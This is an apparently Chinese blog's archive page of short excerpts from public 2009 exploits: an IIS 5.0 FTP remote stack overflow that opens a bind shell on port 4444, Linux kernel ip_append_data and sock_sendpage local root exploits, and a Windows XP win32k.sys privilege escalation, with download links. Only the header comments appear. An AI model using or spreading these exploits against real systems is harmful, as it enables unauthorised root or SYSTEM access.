标签 ‘Exploit’ 下的日志
Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt
阅读全文 »
Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit
/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
阅读全文 »
Linux Kernel 2.x sock_sendpage() Local Root Exploit #2
> Linux NULL pointer dereference due to incorrect proto_ops initializations
> > ————————————————————————-
Quick and dirty exploit for this one:
http://www.frasunek.com/proto_ops.tgz
back: http://milw0rm.com/sploits/2009-proto_ops.tgz
# milw0rm.com [2009-08-14]
Tags: Exploit, Kernel, Linux, LocalLinux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit
/* dedicated to my best friend in the whole world, Robin Price
the joke is in your hands
just too easy — some nice library functions for reuse here though
credits to julien tinnes/tavis ormandy for the bug
may want to remove the __attribute__((regparm(3))) for 2.4 kernels, I have no time to test
阅读全文 »
Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit
# milw0rm.com [2009-07-30]
Microsoft Corporation – http:www.microsoft.com/
Affected Software:
Windows XP Service Pack 2
Windows XP Service Pack 3
阅读全文 »